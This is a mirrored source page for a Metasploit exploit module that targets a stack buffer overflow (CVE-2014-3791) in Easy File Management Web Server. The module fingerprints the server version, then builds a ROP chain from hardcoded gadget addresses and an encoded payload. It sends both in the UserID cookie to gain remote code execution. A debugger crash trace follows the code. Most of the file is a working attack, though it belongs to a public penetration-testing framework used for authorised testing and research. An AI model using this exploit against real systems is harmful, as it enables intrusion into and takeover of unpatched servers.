Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/efs_fmws_userid_bof.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking # Reliable memory corruption

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Easy File Management Web Server Stack Buffer Overflow',

16
        'Description' => %q{

17
          Easy File Management Web Server v4.0 and v5.3 contains a stack buffer

18
          overflow condition that is triggered as user-supplied input is not

19
          properly validated when handling the UserID cookie. This may allow a

20
          remote attacker to execute arbitrary code.

21
        },

22
        'Author' => [

23
          'superkojiman', # Vulnerability discovery

24
          'Julien Ahrens', # Exploit

25
          'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          ['CVE', '2014-3791'],

30
          ['OSVDB', '107241'],

31
          ['EDB', '33610'],

32
          ['BID', '67542'],

33
          ['URL', 'http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536'],

34
          ['URL', 'http://www.web-file-management.com/']

35
        ],

36
        'Platform' => 'win',

37
        'Arch' => ARCH_X86,

38
        'DefaultOptions' => {

39
          'EXITFUNC' => 'process'

40
        },

41
        'Payload' => {

42
          'BadChars' => "\x00\x0a\x0d;",

43
          'Space' => 3420 # Lets play it safe

44
        },

45
        'Targets' => [

46
          # Successfully tested efmws.exe (4.0.0.0) / (5.3.0.0) on:

47
          # -- Microsoft Windows XP [Version 5.1.2600]

48
          # -- Microsoft Windows    [Version 6.1.7600]

49
          # -- Microsoft Windows    [Version 6.3.9600]

50
          ['Automatic Targeting', { 'auto' => true }],

51
          ['Efmws 5.3 Universal', { 'Esp' => 0xA445ABCF, 'Ret' => 0x10010101 }],

52
          ['Efmws 4.0 Universal', { 'Esp' => 0xA4518472, 'Ret' => 0x10010101 }],

53
          # 0x10010101 = pop ebx > pop ecx > retn

54
          # 0xA445ABCF = 0x514CF5 push esp > retn 0c

55
          # 0xA4518472 = 0x457452 jmp esp

56
          # From ImageLoad.dll

57
        ],

58
        'DisclosureDate' => '2014-05-20',

59
        'DefaultTarget' => 0,

60
        'Notes' => {

61
          'Reliability' => UNKNOWN_RELIABILITY,

62
          'Stability' => UNKNOWN_STABILITY,

63
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

64
        }

65
      )

66
    )

67


68
    register_options(

69
      [

70
        OptString.new('TARGETURI', [true, 'The URI path of an existing resource', '/vfolder.ghp'])

71
      ]

72
    )

73
  end

74


75
  def get_version

76
    #

77
    # NOTE: Version 5.3 still reports "4.0" in the "Server" header

78
    #

79


80
    version = nil

81
    res = send_request_raw({ 'uri' => '/whatsnew.txt' })

82


83
    unless res

84
      vprint_error 'Connection failed'

85
      return nil

86
    end

87


88
    if res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/

89
      version = $1

90
      vprint_status "Found version: #{version}"

91
    elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/

92
      version = $1

93
      vprint_status "Based on Server header: #{version}"

94
    end

95


96
    version

97
  end

98


99
  def check

100
    code = Exploit::CheckCode::Safe

101
    version = get_version

102
    if version.nil?

103
      code = Exploit::CheckCode::Unknown

104
    elsif version == "5.3"

105
      code = Exploit::CheckCode::Appears

106
    elsif version == "4.0"

107
      code = Exploit::CheckCode::Appears

108
    end

109


110
    code

111
  end

112


113
  def exploit

114
    #

115
    # Get target version to determine how to reach call/jmp esp

116
    #

117


118
    print_status("Fingerprinting version...")

119
    version = get_version

120


121
    if target.name =~ /Automatic/

122
      if version.nil?

123
        fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")

124
      elsif version =~ /5\.3/

125
        my_target = targets[1]

126
      elsif version =~ /4\.0/

127
        my_target = targets[2]

128
      end

129
      print_good("Version #{version} found")

130
    else

131
      my_target = target

132
      unless version && my_target.name.include?(version)

133
        print_error("The selected target doesn't match the detected version, trying anyway...")

134
      end

135
    end

136


137
    #

138
    # Fu to reach where payload lives

139
    #

140


141
    sploit = rand_text(80) # Junk

142
    sploit << [0x1001D8C8].pack("V")       # Push edx

143
    sploit << rand_text(280)               # Junk

144
    sploit << [my_target.ret].pack("V")    # Pop ebx > pop ecx > retn

145
    sploit << [my_target['Esp']].pack("V") # Setup call/jmp esp

146
    sploit << [0x10010125].pack("V")       # Contains 00000000 to pass the jnz instruction

147
    sploit << [0x10022AAC].pack("V")       # Mov eax,ebx > pop esi > pop ebx > retn

148
    sploit << rand_text(8)                 # Filler

149
    sploit << [0x1001A187].pack("V")       # Add eax,5bffc883 > retn

150
    sploit << [0x1002466D].pack("V")       # Push eax > retn

151
    sploit << payload.encoded

152


153
    print_status "Trying target #{my_target.name}..."

154


155
    #

156
    # NOTE: Successful HTTP request is required to trigger

157
    #

158


159
    send_request_cgi({

160
      'uri' => normalize_uri(target_uri.path),

161
      'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;",

162
    }, 1)

163
  end

164
end

165


166
=begin

167


168
#

169
# 0x44f57d This will write UserID up the stack. If the UserID is to large it

170
# will overwrite a pointer which is used later on at 0x468702

171
#

172


173
eax=000007d1 ebx=00000000 ecx=000001f4 edx=016198ac esi=01668084 edi=016198ac

174
eip=0044f57d esp=016197e8 ebp=ffffffff iopl=0         nv up ei pl nz na po nc

175
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202

176
fmws+0x4f57d:

177
0044f57d f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

178
0:004> dd @esi

179
01668084  41414141 41414141 41414141 41414141

180
01668094  41414141 41414141 41414141 41414141

181
016680a4  41414141 41414141 41414141 41414141

182
016680b4  41414141 41414141 41414141 41414141

183
016680c4  41414141 41414141 41414141 41414141

184
016680d4  41414141 41414141 41414141 41414141

185
016680e4  41414141 41414141 41414141 41414141

186
016680f4  41414141 41414141 41414141 41414141

187


188
(c38.8cc): Access violation - code c0000005 (first chance)

189
First chance exceptions are reported before any exception handling.

190
This exception may be expected and handled.

191
eax=00000000 ebx=00000000 ecx=015198fc edx=41414141 esi=015198ec edi=015198fc

192
eip=00468702 esp=015197c0 ebp=ffffffff iopl=0         nv up ei pl nz na pe nc

193
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

194
fmws+0x68702:

195
00468702 ff5228          call    dword ptr [edx+28h]  ds:0023:41414169=????????

196


197
=end

198


199